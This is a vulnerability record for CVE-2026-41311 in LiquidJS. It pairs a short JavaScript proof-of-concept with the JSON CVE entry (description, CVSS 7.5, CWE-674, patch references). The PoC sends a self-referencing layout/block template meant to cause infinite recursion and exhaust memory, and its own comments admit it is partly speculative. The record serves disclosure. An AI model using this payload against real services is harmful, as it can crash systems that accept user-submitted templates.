CVE-2026-41311

// PoC for CVE-2026-41311: Infinite Recursion in LiquidJS // This script demonstrates how a circular reference in layout blocks causes a crash. const { Liquid } = require('liquidjs'); async function testDos() { const engine = new Liquid(); // Template A references Layout B const templateStr = '{% layout "layout_b" %}Content{% endlayout %}'; // Layout B references Template A (or itself) creating a loop // Note: In a real scenario, this would be configured via file system or partials // Here we simulate the circular dependency registration if possible, // or simply render a template that includes itself. // Simplified simulation of the vulnerable behavior: // If the engine allows a layout to include the template that calls it, // or includes itself, it crashes. try { // In a vulnerable version, registering a layout that calls the template // or a template that calls itself triggers the loop. // Example of a self-referencing structure: const evilTemplate = `{% layout 'self' %}{% block content %}{% endblock %}{% endlayout %}`; // Assuming 'self' points to a layout that includes the evilTemplate again await engine.parseAndRender(evilTemplate); } catch (e) { console.error('Process crashed or failed:', e); } } testDos();

{"cve": {"id": "CVE-2026-41311", "sourceIdentifier": "[email protected]", "published": "2026-05-09T04:16:21.913", "lastModified": "2026-05-11T16:17:31.220", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.7, a circular block reference in {% layout %} / {% block %} causes an infinite recursive loop, consuming all available memory (~4GB) and crashing the Node.js process with FATAL ERROR: JavaScript heap out of memory. This allows any user who can submit a Liquid template to perform a Denial of Service attack. This issue has been patched in version 10.25.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-674"}]}], "references": [{"url": "https://github.com/harttle/liquidjs/commit/e2311dfd6e82f73509308aa8a3a1fafc92e226f0", "source": "[email protected]"}, {"url": "https://github.com/harttle/liquidjs/releases/tag/v10.25.7", "source": "[email protected]"}, {"url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-4rc3-7j7w-m548", "source": "[email protected]"}, {"url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-4rc3-7j7w-m548", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}